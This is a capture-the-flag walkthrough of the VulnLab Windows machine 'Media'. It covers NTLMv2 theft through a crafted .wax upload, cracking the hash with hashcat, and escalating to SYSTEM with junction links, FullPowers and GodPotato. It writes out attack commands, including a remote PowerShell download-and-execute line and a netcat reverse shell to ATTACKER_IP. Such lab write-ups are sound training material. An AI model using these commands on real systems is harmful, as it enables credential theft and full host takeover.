Overview

Field Detail
Name Media
OS Windows
Difficulty Medium
Platform VulnLab
Topics NTLMv2 Theft, Hash Cracking, Junction Link Abuse, SeImpersonate

Services Scan

Nmap reveals three open ports: SSH (22), HTTP (80), and RDP (3389).

PORT     STATE SERVICE       REASON          VERSION
22/tcp   open  ssh           syn-ack ttl 127 OpenSSH for_Windows_9.5
80/tcp   open  http          syn-ack ttl 127 Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: ProMotion Studio
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services

Attacking HTTP

The homepage exposes a form that accepts file uploads, stating the file will be played by Windows Media Player. This is the entry point for stealing credentials.

Steal NTLMv2

Using ntlm_thief, craft a malicious .wax file (a format supported by Windows Media Player) pointing back to the attacker’s machine. Start responder to capture the incoming authentication:

responder -I tun0

Upload the .wax file via the web form. As expected, Responder captures the NTLMv2 hash.

Crack the NTLM Hash

Identify the hash type using haiti:

haitichk enox.ntlm

NetNTLMv2 (vanilla) [HC: 5600] [JtR: netntlmv2]
NetNTLMv2 (NT) [HC: 27100] [JtR: netntlmv2]

Crack with Hashcat using mode 5600:

hashcat -m 5600 enox.ntlm `fzf_wdlist`

Result: ENOX::MEDIA:<hash>:1234virus@

Privilege Escalation

The cracked credentials are valid for SSH. Running PowerUp.ps1 yields nothing useful, but Seatbelt reveals an interesting file:

IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.105/PowerSharpPack.ps1')
PowerSharpPack -seatbelt -Command "-group=user,misc"

Output highlights:

C:\Users\enox\Documents\review.ps1

Analyze review.ps1

The script runs as a service, periodically reading C:\Windows\Tasks\Uploads\todo.txt and opening files in Windows Media Player. Key logic:

$todofile="C:\\Windows\\Tasks\\Uploads\\todo.txt"
$mediaPlayerPath = "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"

while($True){
    if ((Get-Content -Path $todofile) -eq $null) {
        Sleep 60
    } else {
        $result = Get-Values -FilePath $todofile
        $filename = $result.FileName
        $randomVariable = $result.RandomVariable

        Start-Process -FilePath $mediaPlayerPath -ArgumentList "C:\Windows\Tasks\uploads\$randomVariable\$filename"

        Start-Sleep -Seconds 15
        Stop-Process -Name "wmplayer" -Force
        UpdateTodo -FilePath $todofile
        Sleep 15
    }
}

The folder name ($randomVariable) is not truly random — it is deterministic based on what was submitted via the form.

Since we lack write access to C:\xampp\htdocs directly, we create a junction link pointing C:\Windows\Tasks\uploads\<FOLDER_NAME>C:\xampp\htdocs, exploiting the service account’s write permission on C:\:

mklink /J C:\Windows\Tasks\uploads\FOLDER_NAME C:\xampp\htdocs

The attack flow looks like this:

flowchart TD A[Upload .wax via Web Form] --> B[Responder Captures NTLMv2] B --> C[Crack Hash with Hashcat] C --> D[SSH as enox] D --> E[Discover review.ps1 via Seatbelt] E --> F[Identify deterministic folder name] F --> G[Create Junction Link\nTasks/uploads/FOLDER → htdocs] G --> H[Upload PHP Reverse Shell] H --> I[Trigger via HTTP Request] I --> J[Shell as Local Service Account] J --> K[FullPowers → Recover SeImpersonate] K --> L[GodPotato → Shell as SYSTEM]

Shell as Service Account

Upload a PHP reverse shell to the web root via the junction link, set up a listener, and trigger execution by requesting the shell URL. This yields a shell as Local Service Account.

Use FullPowers to recover the default privilege set of the service account, including SeAssignPrimaryToken and SeImpersonate:

.\FullPowers.exe

Abuse SeImpersonate

With SeImpersonate in hand, use GodPotato to escalate to SYSTEM:

.\gp.exe -cmd "C:\xampp\nc.exe -e cmd.exe ATTACKER_IP PORT"

Shell received as NT AUTHORITY\SYSTEM. 🎉

Key Takeaways

  • .wax files can be weaponized as NTLM theft vectors against Windows Media Player — always consider what file types a target application processes.
  • Weak or reused passwords make hash cracking trivial; 1234virus@ is not a strong credential.
  • Deterministic “random” variables in scripts are a design flaw — predictable values enable junction link abuse without needing direct write access to the target directory.
  • Junction links are a powerful Windows-specific technique to redirect file I/O from a writable path into a restricted one.
  • SeImpersonate + GodPotato remains a reliable and consistent path from Local Service to SYSTEM on unpatched or misconfigured Windows hosts.